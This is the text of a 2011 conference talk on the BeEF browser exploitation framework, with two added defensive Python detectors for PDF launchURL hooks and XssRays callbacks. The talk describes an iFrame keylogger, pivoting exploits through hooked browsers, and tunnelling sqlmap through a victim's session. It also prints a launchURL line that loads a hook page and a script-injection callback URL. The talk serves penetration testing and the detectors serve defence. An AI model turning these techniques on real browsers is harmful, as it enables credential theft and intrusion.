Dr. Strangelove or: How I Learned to Stop Worrying and Love the BeEF
Michele “antisnatchor” Orru’
18 September 2011
Who am I?
❖ Penetration Tester @ The Royal Bank of Scotland
❖ BeEF core developer:
  - Tunneling Proxy
  - XssRays integration
  - various exploits
  - lots of bug-fixing, testing and fun
❖ Kubrick fan
❖ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi
❖ @antisnatchor
❖ http://antisnatchor.com
Outline: cutting, devouring and digesting the legs off a browser
❖ What the hell is BeEF?
❖ Cutting
  - Target enumeration and analysis
❖ Devouring
  - Internal net fingerprint
  - Exploiting internal services through the hooked browser
  - Keylogging, browser pwnage
❖ Digesting
  - Persistence, tunneling sqlmap/Burp through BeEF proxy
  - XssRays integration
❖ Future development and ideas
What the hell is BeEF?
❖ BeEF: Browser Exploitation Framework
❖ Pioneered by Wade Alcorn in 2005 (public release)
❖ Powerful platform for client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse
❖ Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.
❖ The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
Devouring: Internal net fingerprint
❖ Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (OWASP AppSec EU 2011)
❖ They developed new BeEF modules
❖ They are working with us and their work will be available in BeEF trunk soon.
A few examples:
  ❖ Internal DNS enumeration
  ❖ Reliable port scanning
  ❖ Ping sweep
Devouring: exploiting internal services
❖ Network/JbossJmxUploadExploit module
❖ The JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot)
❖ Then why not use the victim browser as a pivot?
Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way...” on Vimeo (http://vimeo.com/24410203)
Devouring: persistent keylogging
❖ Persistence/iFrameKeylogger module
❖ We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS.
❖ After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
Devouring: module autorun
❖ We’ve ported back (from the old PHP version) the autorun feature
❖ Add autorun: true in the config.yaml of the command module that you want to autorun
❖ When a new browser is hooked in BeEF, the module will be launched automatically
❖ Imagine adding autorun: true in the Metasploit autopwn module (another feature ported back)...
Digesting: hook default browser
❖ Originally disclosed by Billy (xs-sniper) Rios in „Expanding the Attack Surface”
❖ Browser/HookDefault module
❖ We use a PDF in order to attempt hooking the default browser
❖ When executed, the hooked browser will load a PDF in a new window and use that to start the default browser:
  ❖ app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html", true);
❖ If everything goes ok, we have hooked the default browser.
❖ Future improvements: configurable bounce page and Ruby PDF library
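From the defender's side, the bounce this slide relies on leaves a recognisable trace inside the PDF itself: JavaScript that calls app.launchURL. The following is an added triage example, not BeEF code and not from the talk: it inflates FlateDecode streams so a launchURL call hidden in a compressed JavaScript object is found too, and returns every URL such a call would open. The PDF byte strings are constructed here (minimal skeletons, not complete files); the first one carries the URL shown on the slide, the others use placeholder addresses.

```python
import re
import zlib
from typing import List

# Constructed sample: a minimal PDF skeleton whose /OpenAction runs JavaScript
# calling app.launchURL, as the slide describes. In a PDF literal string the
# parentheses of the call are escaped as \( and \).
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /JavaScript /JS (app.launchURL\\("
    b"\"http://192.168.56.1/page-With-BeEF-Hook-Js.html\", true\\);) >> endobj\n"
    b"%%EOF\n"
)

# Constructed benign sample: JavaScript present, but no launchURL call.
BENIGN_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /S /JavaScript /JS (this.print\\(\\);) >> endobj\n"
    b"%%EOF\n"
)

# app.launchURL( "url" ... ) with an optional PDF-string escape before the paren.
LAUNCH_RE = re.compile(r"""app\.launchURL\s*\\?\(\s*["']([^"']+)["']""")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def _inflate_streams(pdf_bytes: bytes) -> bytes:
    """Return the raw bytes plus the inflated body of every stream zlib accepts.

    decompressobj() is used instead of zlib.decompress() so that a stream whose
    trailing checksum byte was eaten by the end-of-stream regex still yields its
    data; streams that are not FlateDecode raise zlib.error and are skipped.
    """
    extra = []
    for m in STREAM_RE.finditer(pdf_bytes):
        try:
            extra.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue
    return pdf_bytes + b"\n" + b"\n".join(extra)


def find_launch_urls(pdf_bytes: bytes) -> List[str]:
    """List every URL passed to app.launchURL in the document's JavaScript."""
    text = _inflate_streams(pdf_bytes).decode("latin-1")
    return LAUNCH_RE.findall(text)


def make_compressed_sample(url: str) -> bytes:
    """Constructed helper: wrap a launchURL call in a FlateDecode stream object."""
    js = f'app.launchURL("{url}", true);'.encode()
    body = zlib.compress(js)
    return (b"%PDF-1.7\n3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Filter /FlateDecode /Length " + str(len(body)).encode()
            + b" >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    # "bounce.example.invalid" is a placeholder host, not an address from the talk.
    samples = [("sample", SAMPLE_PDF), ("benign", BENIGN_PDF),
               ("compressed", make_compressed_sample("http://bounce.example.invalid/hook.html"))]
    for label, blob in samples:
        urls = find_launch_urls(blob)
        print(f"{label}: {'FLAG' if urls else 'ok'} {urls}")
```

A raw byte search is deliberately kept alongside the inflated streams, because JavaScript can sit in an uncompressed literal string as well as in a stream; a reader that only looks at one of the two misses the other. Any PDF that launches a URL at open time is worth holding for review regardless of where the address points.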
Digesting: tunneling proxy
❖ Having a communication channel with the hooked browser, we can:
  ❖ Receive requests as a proxy on BeEF
  ❖ Translate these requests to XHRs (in-domain)
  ❖ Parse the XHR responses and send the data back to the original requestor...
Digesting: tunneling proxy
❖ Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios:
  ❖ browsing the authenticated surface of the hooked domain through the security context of the victim browser;
  ❖ spidering the hooked domain through the security context of the victim browser;
  ❖ finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
Digesting: tunneling proxy
Let’s see the tunneling proxy in action! (demo time)
Digesting: XssRays
❖ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner
❖ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS.
❖ What XssRays does is basically parse all the links and forms of the page where it is loaded and check for XSS in GET and POST parameters, and also in the URI path.
Digesting: XssRays
❖ The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames
❖ This is now patched in all recent browsers. So how to check for XSS cross-domain, respecting the SOP restrictions?
Digesting: XssRays
❖ We inject a vector that will contact back BeEF if the JS code is successfully executed (thus confirming the XSS).
❖ No false positives (oh yes, that’s what I like)!
❖ Basically the document.location.href of the injected iFrame that contains the vector will point to a known BeEF resource. The following is an example value of href:
  ✴ http://192.168.84.1:3000/ui/xssrays/rays?hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection%20double&method=GET
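The same callback that gives XssRays its zero-false-positive confirmation is also what a defender sees leaving the network: a hooked browser fetching /ui/xssrays/rays on the BeEF server with the confirmed target in the poc parameter. As an added example, not BeEF code and not from the talk, the routine below picks those callbacks out of egress-proxy log lines and recovers which internal host, path, vector and method were confirmed. The callback path and parameter names (hbsess, raysscanid, poc, name, method) are taken from the URL on the slide; the log format, client addresses and the non-matching lines are constructed.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlparse

# Constructed egress-proxy log lines in a combined-log-like format. The second
# line carries the exact callback URL shown on the slide; the other two are
# ordinary traffic and must not be flagged ("example.invalid" is a placeholder).
SAMPLE_LOG = """\
10.0.0.15 - - [18/Sep/2011:14:02:09 +0200] "GET http://192.168.84.128/dvwa/index.php HTTP/1.1" 200 1843
10.0.0.15 - - [18/Sep/2011:14:02:11 +0200] "GET http://192.168.84.1:3000/ui/xssrays/rays?hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection%20double&method=GET HTTP/1.1" 200 0
10.0.0.22 - - [18/Sep/2011:14:02:15 +0200] "GET http://intranet.example.invalid/ui/xssrays/help.html HTTP/1.1" 200 512
"""

# Path of the BeEF resource the confirmation iFrame navigates to (from the slide).
XSSRAYS_CALLBACK_PATH = "/ui/xssrays/rays"

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"'
)


def parse_callback(url: str) -> Optional[dict]:
    """Return the confirmed-XSS details if `url` is an XssRays callback, else None."""
    parsed = urlparse(url)
    if parsed.path != XSSRAYS_CALLBACK_PATH:
        return None
    # parse_qs splits on '&' and decodes each value once; the poc value is the
    # vulnerable URL with its own query already percent-encoded, so it survives
    # as one value and the empty '&&' pair is dropped.
    qs = parse_qs(parsed.query, keep_blank_values=True)
    first = lambda key: qs.get(key, [""])[0]
    target = urlparse(first("poc"))
    return {
        "beef_server": parsed.netloc,
        "hbsess": first("hbsess"),
        "scan_id": first("raysscanid"),
        "vector_name": first("name"),
        "method": first("method"),
        "target_host": target.netloc,
        "target_path": target.path,
        # The injected value itself, decoded, so the affected parameter is visible.
        "payload": parse_qs(target.query).get("name", [""])[0],
    }


def scan_log(log_text: str) -> List[dict]:
    """Walk proxy log lines and collect every XssRays confirmation callback seen."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        details = parse_callback(m.group("url"))
        if details:
            details["client"] = m.group("client")
            details["timestamp"] = m.group("ts")
            hits.append(details)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} client {hit['client']} confirmed XSS to BeEF at "
              f"{hit['beef_server']}: {hit['method']} {hit['target_host']}"
              f"{hit['target_path']} payload={hit['payload']!r} ({hit['vector_name']})")
```

Two things fall out of a hit that are useful beyond the alert itself: the client address identifies which workstation's browser is hooked, and target_host plus target_path name an internal page that has just been proven vulnerable, so the ticket for the application owner can be opened with the exact parameter and payload rather than a vague report.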
Future dev and ideas
❖ Improve XssRays:
  ❖ add more attack vectors, more testing
  ❖ add JS depth crawler
❖ Multi-hooking: a browser can be hooked on multiple domains
❖ Check for time-based blind SQLi cross-domain via JS
❖ Improve the BeEF console (command line UI)
❖ Well... take a look here: http://code.google.com/p/beef/issues/list
Get in touch with us
❖ Follow the BeEF: @beefproject
❖ Check out BeEF: http://code.google.com/p/beef/
❖ Check our website: http://beefproject.com
❖ Have fun with it
❖ We’re hiring!!! (but we’ll not pay you... seriously, we have so many tasks to do, join us)
Thanks to
❖ Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan, ...
❖ My colleagues Piotr & Michal
❖ My employer
❖ Hacktivity crew and you attendees